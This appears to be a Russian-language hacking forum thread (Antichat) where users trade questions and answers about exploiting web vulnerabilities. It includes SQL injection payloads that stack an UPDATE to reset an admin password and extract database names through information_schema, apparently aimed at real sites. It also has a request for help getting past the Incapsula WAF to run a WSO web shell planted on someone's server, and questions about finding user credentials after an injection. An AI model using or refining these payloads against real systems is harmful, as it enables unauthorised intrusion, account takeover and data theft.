Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Точнее нельзя использовать несколько запросов, точнее возможно, но их нужно разделять точкой с запятой ;.
    Например:
    PHP:
    www.site.com/victim.php?id=10'+union+select+1,2,3...; UPDATE 'admin_login' SET 'password' = 'pas1' WHERE login_name='adm'
    В случае с Mysql это не прокатит.
     
  2. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Это ещё зависит от используемого ЯП и функции выполнения запросов. В стандартной mysql_query из php множественные запросы запрещены))
     
  3. MrKloud

    MrKloud New Member

    Joined:
    3 Jan 2012
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Уважаемые, помогите вывести хоть что нибудь.
     
  4. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    https://forum.antichat.ru/thread43966.html

     
  5. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    329
    Likes Received:
    42
    Reputations:
    -5
    вот так?
    http://site.ru/index.php?id=123'+UNION+SELECT+1,2,3,admin,5,6,7,8,9,10,11,12,13,14,15,16,17,18 UPDATE 'admin' SET 'password' = '123' WHERE username='admin'+--+
     
    #22825 Hapk, 12 Dec 2013
    Last edited: 12 Dec 2013
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,654
    Likes Received:
    173
    Reputations:
    75
    тебе ж сказали, в майскул разделение запросов работать небудет, ты хоть читаешь что тебе пишут или нет?
     
    1 person likes this.
  7. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    329
    Likes Received:
    42
    Reputations:
    -5
    Бля не так просто понял!
     
  8. BOSS

    BOSS New Member

    Joined:
    15 Jun 2010
    Messages:
    142
    Likes Received:
    3
    Reputations:
    0
    Подскажите какая веб-уязвимости сейчас являются наиболее распространенными? Очень хочется начать изучать веб-уязвимости, но естественно хочу начать с актуального и распространенного.
     
  9. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,369
    Likes Received:
    605
    Reputations:
    1,101
    Сбербанк, С count(*) сложнее, но данные можно выводить:
    Code:
    lan=3&pid=0%26(([COLOR=Yellow]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21[/COLOR])>(SELECT*FROM([COLOR=DarkOrange]SELECT*FROM information_schema.tables LIMIT 1[/COLOR])a1 WHERE @:=[COLOR=Red]ascii(mid(TABLE_SCHEMA,1,1))[/COLOR]))UNION(SELECT @)&type_id=2&raznovid=2&num_set=undefined
    
    Возвращает код первого символа имени базы данных. Остаться выяснить ограничение длины у фильтра на число и можно приступать. :)

    sabe, Здесь нормальный вывод, не blind. Если у вас получиться упростить запрос - это хорошо, но на некоторых запросах БД может надолго зависнуть, осторожно.
     
    #22829 randman, 13 Dec 2013
    Last edited: 13 Dec 2013
    1 person likes this.
  10. -=Cerberus=-

    -=Cerberus=- κρυπτός γράφω

    Joined:
    29 Apr 2012
    Messages:
    1,322
    Likes Received:
    916
    Reputations:
    388
    Доброго времени суток ачатовцы!

    подскажите как обойти Incapsula WAF
    есть шелл WSO. Пытаясь его открыть, когда как, то пускает, то нет, но оказавшись внутри не могу ничего исполнить сразу ловлю бан. Админки прикрыли, так что шелл последняя зацепка.

    может быть кто нибудь сталкивался с этим зверем и есть решение?

    судя по отчету сравнительного тестирования Incapsula WAF vs CloudFlare пробелы в защите имеются

    ХЭЭЭЛППП МИ!!!

    p.s Эта хрень таскает по всему сайту свои кукисы, может быть валидность вызываемых страниц сайта завязана на поле Referer и этих куках
     
    #22830 -=Cerberus=-, 13 Dec 2013
    Last edited: 13 Dec 2013
  11. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    561
    Likes Received:
    160
    Reputations:
    324
    Code:
    https://e-pay.by/https://e-pay.by/?invaliduser
    https://e-pay.by/https://e-pay.by/
    https://e-pay.by/https://e-pay.by/news?page=9
    что это такое?
     
  12. MrKloud

    MrKloud New Member

    Joined:
    3 Jan 2012
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Добрый день! Пытаюсь посмотреть, есть ли файловые привилегии у юзера, но пишет, мол в доступе отказано.
     
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,450
    Likes Received:
    772
    Reputations:
    834
    если используешь запрос по выборке и кавычек нет, то к нужной записи в колонке надо хексить, пример:
     
    _________________________
  14. MrKloud

    MrKloud New Member

    Joined:
    3 Jan 2012
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    То же самое.
     
  15. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    Как можно записать, чтобы значение было больше определнного..
    К примеру where value=больше50
    Что то понять не могу как это записать :)
     
  16. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    164
    Likes Received:
    74
    Reputations:
    85
    Тебе сюда :)
     
  17. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    :D
    догадался после того, как отправил здесь сообщение
     
  18. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    164
    Likes Received:
    74
    Reputations:
    85
    +++ Молодец, прогрессируешь! :D
     
  19. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,450
    Likes Received:
    772
    Reputations:
    834
    Посмотрел скуль в личке, все просто))) там просто нет доступа к mysql.user, по этому и нет файловых привилегий! модераторы, почистите от оффтопа
     
    _________________________
  20. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    209
    Likes Received:
    46
    Reputations:
    33
    Есть у меня ссылка одна, там есть sql injection, раскрутил, узнал имена бд, лезу в бд а там какие-то тех. данные и больше ничего.
    На самом сайте есть форма авторизации для зареганых пользователей, а вот куда ихние данные могут записываться?
     
Loading...
Thread Status:
Not open for further replies.